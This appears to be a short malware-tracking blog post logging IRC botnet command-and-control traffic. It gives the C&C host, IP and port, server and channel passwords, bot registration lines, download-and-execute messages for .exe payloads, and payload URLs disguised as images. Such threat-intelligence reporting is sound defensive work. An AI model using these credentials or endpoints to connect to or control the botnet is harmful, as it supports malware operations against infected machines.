nice.niceshot.in(botnet hosted in Netherlands Rijndata B.v)

Remote Host Port Number
46.21.169.42 6567 PASS s1m0n3t4

MODE [SI|USA|00|P|57896] -ix
JOIN #yur# c1rc0dusoleil
PONG Apple.Network
NICK [SI|USA|00|P|57896]
USER XP-0495 * 0 :COMPUTERNAME

MODE [SI|USA|00|P|69385] -ix
JOIN #wal# c1rc0dusoleil
PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_12581.exe @ 96.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|48857]
USER XP-5184 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|48857] -ix
JOIN #wel# c1rc0dusoleil
NICK [SI|USA|00|P|69385]
USER XP-6855 * 0 :COMPUTERNAME

UPDATE:
MODE [SI|USA|00|P|94601] -ix
JOIN #wul# c1rc0dusoleil
PONG Apple.Network
NICK [SI|USA|00|P|94601]
USER XP-1133 * 0 :COMPUTERNAME

UPDATE:
JOIN #update# c1rc0dusoleil
MODE [SI|USA|00|P|12877] -ix
PRIVMSG #update# :[Dl]: File download: 92.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_83336.exe @ 92.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|59455]
USER XP-6072 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|59455] -ix
NICK [SI|USA|00|P|12877]
JOIN #sut# c1rc0dusoleil
USER XP-1448 * 0 :COMPUTERNAME
NICK [SI|USA|00|P|03078]

The data identified by the following URLs was then requested from the remote web server:
http://img101.herosh.com/2011/04/18/919297453.gif
http://img102.herosh.com/2011/04/18/675075135.gif

UPDATE:
MODE [SI|USA|00|P|99411] -ix
JOIN #pat# c1rc0dusoleil
PRIVMSG #pat# :[Dl]: File download: 80.0KB to: c:WINDOWSyg.exe @ 80.0KB/sec.
PRIVMSG #pat# :[Dl]: Created process: “c:WINDOWSyg.exe”, PID:
PONG Apple.Network
NICK [SI|USA|00|P|99411]
USER XP-0024 * 0 :COMPUTERNAME

infos about hosting:
http://whois.domaintools.com/46.21.169.42

Categories: Uncategorized